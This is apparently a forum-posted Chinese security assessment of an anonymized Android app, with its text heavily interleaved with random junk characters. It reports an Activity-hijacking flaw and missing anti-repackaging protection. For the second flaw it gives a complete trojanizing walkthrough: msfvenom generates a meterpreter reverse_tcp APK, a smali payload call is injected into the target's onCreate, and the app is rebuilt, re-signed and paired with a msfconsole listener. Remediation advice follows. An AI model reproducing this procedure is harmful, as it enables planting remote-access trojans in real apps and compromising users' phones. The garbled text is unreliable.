/ x, Q" ]$ [( o. b- ?( W7 n m H! |8 j: ^2 ^3 s

/ @% g; {( V5 @" d9 M% }2 H! [ 2 M" E, _4 {1 K   + s: V: ~8 u; `2 a' z : b) R% Y9 x7 A9 u, [1 C2 t

7 S' G# z( V% |- p/ a( W1 u3 y1 d4 ^) V1 N9 g
! l+ t' b" v) [/ I2 |6 ? 5 D8 U9 K, h% ~. T5 G$ p
S5 Y3 Y: g- S. o& R/ K . M/ a8 p+ b6 ]& B

* k, l: \6 k6 N. q* e$ t$ M0 A' h2 u3 u% w   9 }* ^) ^$ P. X) B2 | \: U8 x) w6 \ r/ v/ y" B. L

9 c! I- C3 O0 l q8 f: T7 v2 _! b. u0 V t/ \0 y

3 U; n: {. r9 U) H3 D: H, w 3 ?7 ?" X. F3 l1 e/ g/ E. { 表1-2 测试结果 8 Z/ b* k0 i X: G) f: e6 J! W 0 m& a! s. f0 j% ]2 J4 a" `

( \7 z$ r4 G5 @; @ ! L n( v% Z S

) P- e! ^2 s, X' b6 ^ 7 B! r/ Z0 G( ]% x2 q   ; T; y! R- G6 U : R# k* p/ ~+ g; }

1 Q! I$ v$ _4 s, Q6 j7 o - r- [# X- U/ q

7 R. ~* t' Y: J* l 1 r$ d1 \9 A% A 2 检测结果                    ( Q# i2 e8 [! t0 f f0 N2 G* ]+ L+ z, h# Y: N

# M! C" o+ C) K' H e- N/ C) U7 `$ S1 S# o$ o

) Z/ U! \1 o! q! i9 S# l0 L! O & s9 W; M6 Z( I; a 2.1 某某某 # M0 G# z' C$ W* | i3 Y3 U3 _( J8 q! A+ I

; w9 u# K3 u, ^7 M 3 m, V* n, ~; |- l) U

/ K& Q4 X2 i1 e' g( L, F5 l) b6 V) y) t! E, F 2.1.1检测目标 1 n6 Q6 l" Q% c0 }" A4 S& g% _# V: b! Q4 F. Z2 @% s4 p/ t

1 h, g& `0 `6 S2 u8 i& }7 }- v9 u5 { " t" R8 E; ~4 G% h3 t) `

6 x" n- z2 B2 C 9 f2 h# ?. e" \4 ^: Z& R$ u, \. z 目标地址: 某某某某某某APP . `8 k7 {# X0 p4 K' ^: T1 H$ F3 B% k6 \, h

# l* \) D: G9 O9 M; a4 H 1 ~5 D8 r. d1 v, ~

5 K1 W9 M7 x) a& u, E h1 I , O) J& C7 C4 I+ I. U! K* H; {4 N 2.1.2检测结果 8 y. X3 N7 V' Y ! u) h1 \) d5 |- _

0 T1 ?. o% M ?/ W) P5 C$ [$ u! [( a9 S! ?( {" n

; }& i- @: B/ t4 J! }! r 1 h/ r' B+ n( [) h0 v" p! d 2.1.2.1 . X& P4 X1 _) H0 j! x# p8 y1 P$ X. I; q- _0 D" }

3 _6 k$ _0 \2 V# Q' A 2 }: i. q7 m! {& u. e

% P: R* g% }4 m) [) G1 h1 \ % |" f+ m- ^/ v6 a; Z. k 漏洞链接地址:某某某某某某APP 7 [2 D; \$ l1 }+ r% M/ ^ ; L% k. k+ [8 \) A0 V; n- j/ C

8 U+ t9 r- O: o( P2 v+ p8 ?" \( v; F9 P! v8 S! z

0 F% w( R) @8 f9 C# x ( t- v) E( E: ^! N   ' k( H2 t" W! h( {) `1 o/ X6 f0 g b7 |& A1 |) b0 E# D+ p; C

2 t3 O' x5 V2 k r5 r 2 `( t7 ?# \4 K* b

7 n7 _+ y8 w7 @; h/ M- }+ \ N& F1 i: f: [& Z* F; ` 漏洞分析及取证: ' [, b# B8 `& ^- K3 z& @; H 5 \! L7 Y* s) G# y% O

4 g% U! _) ~5 i# U1 v% a. {3 @0 G+ i, C+ A! P: f# R- T* V9 b

$ P; P! a. s6 B/ K( u1 R2 t+ l# X; p0 i. d; s1 h5 u% A- A$ G5 }                  通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: : J# }2 ?; u: @- C; `% m3 J 3 n) _" i! E7 j# R; a7 I

* x+ ^7 n7 T+ `8 ~ Y! h ! q* v- o% M' D) u& K

; d/ k# w; p6 v6 Q" C7 f3 P ; L ^" M2 ~4 Y/ a      8 i% `) t" Z3 u! E # S9 s. o) R7 G, J7 Z

0 A5 \1 B7 J1 ~+ T4 i1 |/ |) c. }1 j% P9 V8 p6 Y. r

& x2 }2 g' N6 f+ s' f% J4 d # K1 g8 @7 Z6 W0 W' ]0 n1 `                       ' j2 ?+ }0 o; @3 F& q/ Y 6 L8 p0 e, v4 C& r5 Q$ [9 H# A m5 q( D

7 F1 ~3 w2 Z6 g/ j: c2 Q3 p5 C: y 3 y$ M) Y% g; W( ]9 d

5 l8 V4 G2 A! k7 j, |' V * m# o" \9 _1 J- ~9 c3 M/ c2 B 8 i8 O1 H5 @5 |! p) p, _5 R$ Q& ^ / Q3 V3 a6 @) Y) R# R

- d2 v6 \' w6 p) W1 b 2 L( e R6 p1 Y8 ]; s

/ L/ r5 o4 k. l! e0 }' [" p( E/ e; i* M7 U, [/ G1 ]4 o. G1 U , \! y9 P; _9 J/ f& n0 k8 g; f u

! t* H& f3 z$ v5 l, {$ b; G 9 z) B' u6 l* `, M$ w7 ]$ M

+ C& W0 G; F7 Q% ]+ g% E4 B3 h7 T5 w0 U# Y6 E ) Y$ ?, H% y1 Q7 ^( v6 I% L4 l ' h! k3 ?" p3 r" h

% C2 @' h5 X% C$ o8 S3 \& @ S. B2 ]6 `+ n8 b0 C

3 U" C" \$ Z" k; k; U; D& k ) N9 `# `+ M3 C7 A! R, { 漏洞危害:高 7 I$ {/ T1 ]9 z+ K( @ ( x7 r2 y: t/ l! z/ _

3 Z8 A6 \. I# `5 L/ Y! u8 h$ Y* Z * U# j' j. }& e' \
" Y- I2 V2 z/ y1 @ ' _% v; a3 j9 z3 a M: `0 t ( o+ D4 I/ `% F6 A3 e8 }2 N# W) i. E7 W6 S% T1 ^6 n9 u, W( }3 u U* e C5 K7 [6 C- `: M' s% ^ I P8 x0 x4 X. @( J6 x! B G S; T* t7 ^4 L0 l# a9 v0 d8 g4 U# D4 X6 W j4 u7 e6 O4 G2 W) D) c# |: o n4 d# g3 W" {# k% l2 r O6 D3 v8 o* [8 q9 P6 ^2 T$ B- i# {; _' u: i4 T/ T0 M: y! g3 G1 K8 S1 Q7 C( ?/ _3 t+ ?1 e9 g& B0 [! e1 B# R! R/ | I1 C2 U1 j! L& S m/ G/ R$ B5 g" h0 k8 Q' d9 D* I% U( L8 n1 u" L: H- W, w" f# `+ f. @8 n0 y/ V- t7 M$ v9 [3 R: ?8 F l3 G$ r' [+ y: B. d% }- X# s5 F/ C% C8 O8 i" v: x/ M7 ?, Q0 n, r, [! V3 I2 h' Y/ {4 U
/ Q. b Y9 \1 `( U. |# M1 X) t; ^ ! B- B6 K8 F: t1 g. }- j

7 ^3 v/ X: }, g+ {! {8 z y6 a+ }* R- |1 R) t 严重程度 ( {: O- u7 |4 o# B" Y" A/ m ! S3 c/ ]$ U- O7 t

% J w0 J" w& e3 p0 E- ? ' ^) u. Y# L7 g* M' e
$ Y e9 v) O W ) w8 l! f* S6 B0 D- G

/ V/ N2 Y( Z, j8 A . A3 d' M2 d9 v; M0 x# \" Q8 ~. { 高 ) u* {5 Z( c. Y / |7 Q, A7 ^7 a

( q4 F, Y8 q$ P5 \. [ G4 \! [( N! V5 }; ^9 o3 [" U
3 a) g {# X/ _) _ # k+ S. m2 e) h. \

4 U' e6 }, B2 @4 p' c& b , n a* A, Q/ O! P% Y3 s$ G3 Y ■ 9 f# J8 ?' h) _) ~- _- s& n3 q* P, S! Y, g- U: X+ w7 y

4 k2 }" p( x+ u, b1 J! c6 z ! ^3 c. u- b1 g; K
' [. j ?6 ]2 X 4 ?7 f; C( T: K8 l( b- s$ E) h

; p" c" o p R# t, \ # @* H$ C8 _; }5 {$ S( @' W 中 % |* N' H+ } I7 a* A: q : i# h3 p9 ?7 E. c M$ H

T) d4 |6 m+ f i& o& ^+ z c* l; T0 e: |% p
7 m0 X& Z- H$ L7 s) u% U " Y8 ]3 m- u0 M$ [* t; i

- n9 Q. R+ Y. r6 R |0 L N1 ^ - Y. l! H! y! @. x* f/ T2 e9 h3 j   $ T, w# @ b" g9 }) A5 V h- Q C; @0 J/ b" H0 B

) ^9 v, C+ G" R% @- K- [( ] " Q0 f1 e* e v7 D0 t" o% K% @
5 ]- |: m% ?$ s9 Z! P0 Q" l9 J* [+ ]4 U1 k( j; M

2 N$ d: c1 C) u5 \; S {/ w% N5 `/ u5 `5 H+ H: U1 Q 低 7 s+ a1 w2 p0 C& m; v 6 K$ E0 v# Q9 |' }/ J2 t$ g7 t

7 |+ }$ c$ u ]4 b N + {, b, D! Y' b( e* r
7 ]( e! I/ k" n; a% S 1 z7 k4 V( j' }: O `: m" |0 G

& E9 I; K! m5 p5 H* @' a1 X1 ]% \) ] $ S) w( O' ^3 v J8 W5 u   : |' |) ?8 ~0 y6 A" b: B6 D ; e& P% g* o2 k% b

w* L, _2 N2 x- [+ N/ Q+ q $ I9 P% u8 D* F: P. T& Q
9 T5 H) ~* Y9 K( q/ r . D5 _- Y- ^' v
- J% H, Z- V. p# m: ] ) b- E O4 h4 T$ e- U

]' q6 Q5 ]. A# |2 D 3 b9 _" n9 P+ f   ! W: ]3 C/ F( I# k h$ W3 e, S / L* W, i. x8 }0 \( ?% O" C/ _

6 N6 m5 i( u5 U. I" p3 I; O . l, A2 s5 D% V7 Y5 W) Y

0 Q8 I5 p& T$ G1 W) k$ k" t + i: R! k ?6 G: s7 G7 y 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 2 ?% q3 R, M- R8 i$ G$ k 1 N. @$ x! d7 n

# N5 X% L* V5 d, N 6 m" `8 @1 E, ?" M+ k. l

% e- O9 g1 e. }- H, y) s5 e& o. n, p2 S           . d# q Z7 ?$ P1 X7 N; A' I5 k ( B# t' O: \" e4 w# A( N i

! o0 Q' X5 s- a. _" j, O: d4 ~* v% {) m+ J& r" d4 N6 [

7 D# R+ w- l! d7 |+ e9 P) H* \3 _* O2 \' ~$ U6 |   7 a; }5 A" F9 B0 \, { 4 l" y/ e# A4 s, q; m0 o' `: G& G

' I8 M) k8 w8 V: G: F1 D1 x " y# ^2 N6 q6 ~

0 m7 j4 F, D6 X; }, E ! e% U* o7 V5 }* v0 U, E+ q2 m, | 2.1.2.2 ; r1 u4 R# t" X- I n, ? {) \) g + X& h, i" W" e7 C% e% V

& w) m; E6 A/ f- B4 m N - G% @: O5 w9 f8 F6 {

+ `5 _ D3 p. b _0 V) `- e! W7 O 8 y/ O3 y" w- K/ H. n! \ t+ Y 漏洞链接地址:某某某某某某APP ( B* D4 G- i z9 J& ` . e) v( f3 q [: }- w6 x0 O

8 x* O1 W+ C7 g( p; a" b3 D 1 B8 D9 _" B% N/ p8 [

2 y% @6 h Y4 \: ]0 \! l# w # l- A. o7 g6 K9 g 漏洞分析及取证: 6 _* V, O k* I# L5 u! M$ U! z1 x R& f& x+ H8 W

^/ y+ e- |' j) }) G$ |0 i; _ % G7 Q, N) ]0 ]: @8 O8 k; l

& [1 D& h' O+ O& x: H+ c9 K. i# Z& k% D6 K% `                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 2 P+ n- `6 O1 H+ ^9 r2 I3 D/ ^8 I: ~, a" ^; P' ?* d* p

+ v7 k- }$ f4 T% _( G! ? " U8 S. A) K0 d

6 p' z% E* y: o0 r9 K 0 `5 `$ k4 ?, L* P! W' b 用Metasploit 生成木马 apk 7 ^, ? h& ]2 f* ~4 i : [2 q, z$ S' w- W

/ d/ F9 m, a, U- _ % |/ k8 x8 e! W( g

$ D8 U) v A p0 `8 @6 c# C) U. y 3 t9 l2 h& R# }8 p: z, s3 g msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 5 k8 }8 \" t: V% M( e9 O2 j. [" w 2 q7 [5 p5 c& U% R; v- Z0 U. o5 o; |

& Z7 Q" Q% B& p. T; D6 m% ]/ V2 H, m' Z! H$ E2 n9 l T

3 F' N; B+ T- O5 \ % k- K A% X6 H# ~7 j2 V$ p }* J 反编译目标apk和木马apk ! \: G0 r; l+ d8 v# f 6 ~/ z8 f9 O1 k3 [. w. w" _+ B

! q6 y \( o% i" A6 d) n) B$ ^" D3 E% W

2 p" y2 ?/ ^1 n7 i! f4 c) d6 V( _; Y. o' t& ?5 t4 C8 u apktool d target.apk
r: |' [6 N/ Y3 j" a( X2 A3 N ! u0 D- H p5 m* l/ t& H apktool d cockhorse.apk
* V( a; u/ J: ^1 ~8 j) w " d9 y* d2 |; X" V8 o

7 Q+ C, C+ \" s% j3 `8 j ( r4 C$ c; g& _, n

|! Q2 I8 s+ X* ^( v % y' ^* `9 u) A: J. H+ M 木马 apk 注入目标 apk 2 f3 w; _# o1 N X- J $ ]1 Y# }7 ~4 {0 a8 e, Z' l

0 Y) l* i! l& f" U8 c' Z4 D4 h& H 4 l! `1 U U9 K3 ^. d7 h2 o7 l, ~, X

# \2 U+ m& w+ ? . @. a/ @, @$ j. ^/ Q; x: {4 P 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
+ B8 ^0 ^" { o1 a# J 0 M" ~/ k" B' Q* L* T; c* I7 T7 { invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
! w6 _6 o# _5 f 7 n. y( N" g2 \+ `% J& ~1 ~

3 P* H. Y* _/ \( K9 ~' Y5 W$ O# q; G) Z

: L% f7 ~( p9 V+ O$ U% H 7 H& U3 I% w! n9 y. K 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 0 n0 U5 s9 [5 ?; }) G- S , V: R5 I% Y o: w4 \

: ^7 B& k' Z1 R8 H5 J * M: e4 H8 A3 H$ e7 K

; ~, \, A! A9 w6 X3 J( J * V7 c9 p$ {# l) X8 }5 G 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 $ x6 {. p8 H1 c" V + @3 {" \2 W/ |; p( y5 u3 R* o

. i: \1 m* e0 g " f' O9 e8 H4 ~. ?5 C

, q5 s1 i2 ]. u6 r# A6 } - {3 U+ R; `: y, |# y 回编译生成最终 apk 8 x& u0 _+ s2 |: y7 c 2 L5 b, r4 Z- ~

$ ~% @5 S0 V! T8 D9 a: b! T8 @

/ q# a# O; G7 J4 o7 S% ]# j : H( u0 X/ D2 Y 重新打包 1 X" |* u" b" w/ D! @" A$ Z( H2 B% d* ^+ K: J

; a/ G" ~1 w6 u/ {0 v* K, E7 C0 H/ w$ K& T$ f$ }2 G

% o* Q. D* s" _0 O" ~: S8 w ; V u( l* k! r3 ^) Q* W3 r( @( B apktool b -o repackage.apk target_app_floder % Z5 q) o: l( V% O 1 ^5 Q' }( H! n6 t: `8 ^4 X

" i5 {: d7 |# r* T+ \ # f; a; h: L# K/ S+ g! p6 i

( b/ T4 N; F1 Z# b0 `4 K7 T ; t" ?: h% \; }" C 创建签名文件,有的话可忽略此步骤 8 v4 t& A" G% e/ |% s" h( O 0 ^( |6 w% H3 t& J8 [1 x2 j V

+ h2 m4 K9 Q! V 4 m) p" J( `" o

' |' f6 Y+ `# E9 e' f, |. r, k) u! W9 I: ~4 S8 A X keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                9 o- @* A' l2 [( n8 y: b9 R9 e 6 `3 K I6 ~1 N+ [6 s. l

, ]5 p0 k" \9 [) D2 d7 C3 d5 | 5 o5 K6 `% D5 v4 C- D$ [

; B F- ?3 c8 x# R$ \6 ?' E $ K6 I. w0 ?7 L8 i8 X/ X' G 签名,以下任选其一 # ~. M. E% N, c# T : F0 Z" [' c+ D8 _$ C

7 I- U1 R% e' d- z3 N7 K& |0 @

$ A8 Q2 H1 T% A* ? \! C |3 @! j6 Z- I! T$ H0 J jarsigner 方式 5 Q+ G7 D+ Y9 | 6 `! K, B) g6 u7 B, y

; e& b) h5 G2 s( e4 a& ?1 f/ g2 X# F7 D: K" s0 f* r

( _5 j5 r& a, W! u+ L1 r; ]1 C8 t ; Z) R: K8 G0 K6 ^0 v C) P$ ?& W jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname B. w$ ~! b j K+ w 7 f9 H/ R1 C Y7 j* P* ]0 V! A( l) f8 g

2 o3 r) [7 N- `! _. M- \ : u: ?. f9 _* n) `' v

6 }- k! j6 D" c$ m, | 3 {1 f6 |9 U h/ H$ x: k; N; d apksigner 方式 , z1 c1 a+ M! E0 {+ |6 Y4 j1 h8 P- x8 J8 I9 W

( p0 V4 Q2 K0 Q# c; T' n' Z9 g. u) k1 L1 N

4 {: k4 Q8 ~7 q+ e% {. i/ U% ?) N- n+ p apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ' u, K" z( h+ Y7 x7 j; [ 9 q" p* a& t+ ?! y

3 m( V: P8 @$ l. j) Q) ?/ S( Z( b) W4 R) S/ Q4 ?. g5 N/ g6 |

) N8 |: \6 T; m0 b0 \ % c( i$ y, C9 B U U# d 如需要禁用 v2签名 添加选项--v2-signing-enabled false , \. V% u7 D: @ J2 Q6 c* |! |4 C" D( U5 `) [9 o+ Z! b- I5 g

+ V% z. o( z! B2 }1 x1 b 1 f0 K% W+ U+ q1 w, }8 z/ ~

: T* a/ E2 J/ X; {# K # X8 Z% J2 ?& ~6 L) b# s4 }6 M 验证,以下任选其一 3 k s& y) C |6 f& e8 V- A4 r: `8 u/ ?6 Y$ R

+ y% \/ y' J. g2 s4 m " X+ U$ Y4 j9 T. k4 O+ [. V% K

* S7 q3 F; N, Q, x; Z9 o1 G# s9 w. ~0 J4 H7 d' }, {: z jarsigner方式 5 ^! J; ? q {7 a 4 W, M7 O/ ~4 T' t( ~

5 R4 \( l3 F/ |: f. H* f" j+ I% ?& W9 C9 u! b/ _ C

V8 d! V# b! a0 c- z4 P + O& y8 c, [% w9 R% U3 D5 C) A jarsigner -verify repackaged.apk 0 I5 n3 `4 M+ E/ H* L1 x5 Y- q, `* @, u' u( @" Q% k# [

. P7 {% P7 V% B5 X r : e; L) a h2 K8 I3 F6 T1 n

6 H5 `& O5 I% v3 j: l5 ]" |/ v 5 h2 e& h9 q" {' f+ E6 t# ? apksigner 方式 , {7 h: g- ~ }5 Z ; X* j1 ^; K9 X2 y0 y- G9 K

) P7 h, B! k/ {* [. r: y8 v: n; b: N- s1 X1 e4 |

6 L. ~6 h0 E! {" y 8 V0 b- v2 f, _0 D! d9 K- p- k apksigner verify -v --print-certs repackaged.apk 4 p5 x" Z* f0 c6 I5 s9 i, x' n2 x9 L0 `" m& w

3 M+ K& I4 \* \/ o 5 g2 y4 C7 |: F+ A! w* }7 B7 U$ y

: ?5 E4 g/ R# N+ z" r3 [ \: a l& G/ C: x& X0 o/ `( H: o keytool方式 ' G3 j1 z$ c6 @$ H , V7 Y1 b$ Q: {6 n3 p" s5 z& D7 |

) c. N2 [& N/ q C3 {5 d+ I3 [( k6 F& d: {

S6 ]6 `! z7 O4 a9 b/ G 9 V. B9 M; g1 {0 S0 U$ s keytool -printcert -jarfile repackaged.apk ; y# Z6 G+ c+ |; `8 i# f5 p, ]0 s0 T% a) \- Q9 A, d1 E2 ~) K; t

0 N/ u4 i8 Z, V 3 `; W5 w" v. z5 h; y7 P

4 }( _1 A, i7 Y) d/ N; e8 w( t % p" g# K7 J7 I: C 对齐 8 U$ r) m# Q; {9 c) ?+ _" V) D- L4 F5 Q! I% o2 [9 @# ?( i5 U

. p' f/ L. _3 ^9 ^3 X 7 L5 }& b1 i: ]9 _- `/ y7 X. n

) u" p7 U2 o' `/ }3 E6 e9 l ~3 }+ ~ I# S+ d4 e% ^- x2 n 字节对齐优化 " ]) x( u8 P# O& V' i. m6 S1 F * z9 r; l! D/ u, E

4 \! W* ~8 K9 E. x. _2 _3 W 4 p( j4 }3 o) E/ B! x$ z8 j

: v; @! j8 n+ y0 F! Y7 ?) y; o7 B$ \2 M zipalign -v 4 repackaged.apk final.apk 4 [8 Z, f0 n% G0 o9 h3 }# ~9 p b2 d1 [' A, b: _; [1 K

% ^1 {. M. B; }4 y7 Z9 c( H 3 e9 N" e5 E& V

' ~5 I; ]8 p4 Z- G+ r0 ` $ a' S; m- ?( D, K 检查是否对齐 1 }) w& C9 s$ e7 H$ Y; O9 I5 e9 O( _/ i0 I4 ]8 P7 C* ?

/ Y* Y+ s7 q# A) n 0 e3 u# y5 a9 z$ d, A1 K8 V, @

& Q" g. R/ v7 X% T9 R / r) f2 _* ~0 R zipalign -c -v 4 final.apk & C/ O( m1 E- ?) Y4 H# Q # d( X' @6 H0 R

, o/ R' t; `$ ?0 C5 R& K+ }. R * [8 x8 J0 [& M% @( V) ]$ o5 n+ t1 e

( E; O1 O9 l" @6 O9 L0 P 7 K$ }: O1 p$ A- K! } 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ) P( U" t* L7 k- S( v; W/ _. U c& ^$ |: ?5 k* O2 E( j% z P

! U' L/ m( O) e& P! @, Z * W$ R+ ~- P) `/ g9 B/ ?

) m5 ~( J' U8 S+ o8 V. o; G : }3 K. t: k. ~. H L 启动Metasploit控制台,配置参数等待上线 , m( s( ]2 |: ^% m 3 D% @3 |$ Z4 Y0 o% w3 Y! x: z

! ~2 D8 ], ?' _& G s+ | 8 Q! _$ U$ Y" r

: ?" _" v+ W3 w/ t 4 |2 N3 l0 A) q 在终端依次输入如下命令 3 ~ P, d" n+ @: Y 8 r. ]3 o, x) X: {* A1 Z2 r. V

0 W" {- c* N2 H' m8 R: _3 M 0 c7 H) u9 W* B

! g7 b+ Y* M' |, Y) `& a R% v , ^# K; I; s6 I) z* i msfconsole 9 {2 g' o0 A4 Y . {# p7 l- w; z% u" t5 s

, P; O+ K: K7 e2 C/ X4 w" K ; m( I6 v; L& ^

/ `$ o- }6 ?, i3 {9 t. {8 o2 F - ^2 E& l7 u, a2 m$ k. x, u use exploit/multi/handler - y6 S; k. o9 Z+ E & w+ n+ Q! q( r) y6 \

% T; u b' ~* n( F 3 u2 v @, A- c' Y |8 D% I7 ^

2 q; {; R6 N; M8 h# N & i, u( v' B/ E! Q% _& x5 [ set PAYLOAD android/meterpreter/reverse_tcp ! J# a4 X( d$ v I" T6 H% q$ n , J& ]0 e7 F* Q3 I! C* S7 f

; l4 m+ t& c( n) ]; Z % R# l+ ^3 ~" e0 G' j& q6 X

5 T6 _( \* l8 K* X8 a' a% P8 f4 i& W7 `/ W' s" n! W set LHOST 192.xxx.xx.xx 8 P' H* b9 S" l ; S3 e7 g7 L6 |7 `; @7 [

# o/ h5 t, S& j- B9 U) g. g1 ] 1 t" J" i* S/ J

3 `: a) d! k/ q# [4 e8 H. ]1 I: D5 {) Y" [ set LPORT 4444 , s; U, }: k2 I2 V9 _: H+ w 1 R% z* N" t' L) f. L

( U7 u( n/ r* \4 ^7 `. M- @* o% `' [& v

4 Q. i+ @% t1 X) l0 s/ A; z( s ! g5 c& [" U% E4 @. M; s* o exploit . \# O+ b T2 D, ?2 i) [+ s. K1 ?9 u! ]+ t6 v f' P& Q

' i% h" m1 N+ J- \" L. ~1 G: d1 z 8 r9 M% z; D' M: z1 t" n

+ |9 x9 y7 M. J& G H! y" l $ }5 X- L% P& [0 ? 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               4 o0 j/ y. u2 f8 E& j2 M + b, U' K2 b' s+ l. N+ W& q- R" U

, J* Z% b- ^$ r( _3 `2 z- E4 f ; s. C) a" u O C, O4 O8 k

0 O( @1 \: W# D N% @ , t% w8 y- k1 F, K/ j$ z5 V 漏洞危害:中 / a2 n: x1 Q8 A, [) ?/ A k& \ G % A; G$ ?! F. ?0 p; \% r

# t1 U5 @& I; }5 p! f k0 O8 ~7 B, O$ Y; V6 Z4 k( |
' s" Y) H) `% }2 V' l3 k" }9 B2 R9 }1 [; o: k3 h2 E5 U # ~3 n' O" G1 d& C+ G2 P. C 5 n' t8 b& P5 m5 i) [ 9 k3 W# o8 k# B. |. M2 S: w: Z0 f- f- m% r+ w" W) h7 @/ I( p" G3 e$ [* w9 _/ T* J* _: Z' b! Z* H2 r0 g3 v c& R' q- r4 B0 z- F1 v Q J2 x+ M; Q- g0 @5 I+ [4 C5 {: b w% ^% H e/ A, L: G7 h3 O* ]9 l9 o. j" Q# T- {/ E# C: g) B2 d! O- l. i7 P4 f3 Z- l& z7 I* a3 Z. ^2 G: F* s! U! b7 [' y$ I6 F( g3 z: J- F' ?7 b9 y, @- X& C& G& U- u. a4 _9 U t; a$ [) ~, h8 U9 R- ]; n% g' ^! V: w, |4 T5 q5 l" Y! \& H1 N/ J/ c6 v' ?0 f- Q3 Y U4 c% X7 F0 x* {! H8 B; i, p8 V3 k( g& C) E" {4 R/ V$ w7 q% Y% W& ^6 S4 z. Q1 C/ J9 \$ ^" S# y: j q T3 {/ L5 o/ i# O6 n7 B5 x" |# {0 X7 ~. a4 y3 i t2 V5 t% [9 B, i3 N5 A
2 K2 V8 W# [7 i2 s' \' h5 u 6 M; O# {; y! x* T

( d' Z" K& q& l/ a' Y+ H0 ?" J9 @ 0 S) J( {6 `8 T) T' O/ t, W 严重程度 & r ` x2 |0 `9 I; ?) F/ L 1 c- X( r( l0 J. U" g

9 p/ p) K5 k+ P# T# F2 [& V, n4 s& m4 e/ X7 j+ o. K# r
' F3 P3 _8 ^, T( H" H! I 9 Q# K9 l# s y+ o) c; B7 z

+ b% _6 v. ]8 x* K7 b7 y# M ) S8 U; ^! P' p. n# o 高 / G$ E G$ u# V - v1 M+ a0 K9 {! S

- h9 q; _4 v; r5 |) ~% _6 U ! X, w, P' z2 I) a D
& b6 M, O: J/ [' H / l3 |2 \" @ y3 Y. x: W

5 V [' H& I0 b/ L. a; l , H3 ^ x( f! a6 ? ■ % D3 b- @5 U. ^' |4 L; Y7 D 1 a! n: h& N5 x* _: q& m4 [. r

5 W5 G, \4 D# j% a8 Q6 _1 f , r8 x9 n/ n; m+ M! n
/ `) ^. H8 R" x" z 8 o- a! ~- H; O9 g' F+ f/ d

2 B: A8 M- c+ y; h0 O' s9 R ! x; d9 T @! G) Q5 a E 中 * Y1 Z+ \( T0 U0 N1 \7 v 7 G( t( R) ]% {4 f( l: t

- k. Z1 t9 m8 ?% z$ b! l$ [/ n5 x3 p( ^& D0 [6 h) U, E
; }, H0 Z8 _' X+ A" J4 E2 D ' q& d! O* w- t; a % W; b5 t8 V# V, n6 b7 V " A4 v/ a7 G( [' t

, a! d1 n2 U. M# ]$ t. S3 d6 M {% {' u) |0 r: Z* _! u   % {) d+ B+ Z. R+ B0 R4 c# i1 V* l 2 I5 c' L' Z7 k5 }: ]

; o+ q o C$ f2 h( D5 H ' s) j6 {$ x9 d, q# W$ P
) @& U$ u3 \" C* k3 h6 s 7 F7 I. T* i' a1 g, x& J+ Y+ K

5 O. ]+ W( `7 k, u6 l 9 G" z. h8 X% f8 i5 m$ ?3 r! D 低 6 A$ l1 H5 Z1 [6 t " n' f4 u. s5 U9 [" e

9 P G+ }9 I7 b3 U2 r' m2 f + `9 J8 c% J2 g8 @
0 D X) o$ B n# t3 g7 A1 O# t + I6 A) Y2 H+ n {' V* B5 W, m4 ` . S; j6 C' I3 O ) A( t4 @' D A( d1 Y

6 I, f5 t4 C. n$ e 4 Y! h2 J& L% x' \% M& v   " L" d+ m/ i2 [- f# n( u9 f" n ( O9 a1 K: W3 N$ _' j7 s

$ ?+ k( d1 ~4 _( y- N4 Q! M8 B/ x0 b& d" T& U2 V5 x( y% H
$ ]( ^ n% z; Z. K4 Q, F+ o6 Y3 D$ z- J* ?# }/ D
8 O" e" H% [8 u) r) z2 m _: @ 5 A# k. B7 | ~2 @7 r. A1 g

. L1 R4 ~/ ^- k/ i9 G- j 7 P: I2 Q d8 h   ! ]3 e; d g1 _& u# y6 C8 @& s! E1 ^: V+ `$ l' o# D. o8 c

7 A6 ^) Y0 a; h8 s, [* L# k6 e3 k0 m: z# X: v

" m; {7 O! J6 w# f# S0 ]2 | 5 {0 ?9 t9 T5 u9 `2 f- c 修复方法: 2 z& Y9 N9 {% l- I( N( k3 S' g, k4 e5 _3 b

5 Q7 A2 r( |* M& a$ ~ % u! W5 D' k1 y9 t% O7 f* Y

0 v, w- R. C! V8 H9 V6 J7 V0 A+ E! A               1.在 APP 启动时应做签名校验防止二次打包。
6 J, g, Q i$ P6 q 5 I# d* v3 a/ g+ {) ?9 L 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 1 c8 Z2 J/ j) t+ h! m% }1 S/ i" M% Z$ U" Y' u: h

# y( }" Z5 X+ ] , T, L! ` z2 i" J) t9 b$ e8 ?; a $ {8 O; y- l" v$ N9 A, L9 [ " y, i# v. w* @' E! Z' T8 ^4 U" a

& u8 ^& T8 g% N) a6 Y , ]+ Z1 ?1 T! X% r) d- r   ' m: H" G+ K7 o6 `1 y & B1 X% _7 M. ]! b0 r

" Q+ p; _3 o$ E( g5 K9 S8 V ! d/ V7 s& S! O' I* \ b6 I4 h# h, Q2 ^3 l0 Y( f/ Y$ F) H' k B$ C6 r5 f

! Q) w! H b9 Z7 F 4 W2 k- Y' S a. m3 Q7 e' ?
( H2 Z7 b& b) h0 }) Z4 l$ h+ u & C W: F+ o( V5 K J+ M

8 v! u0 G- @) ] w. F 8 V I+ F! J X6 `- c: e# _
回复

使用道具 举报

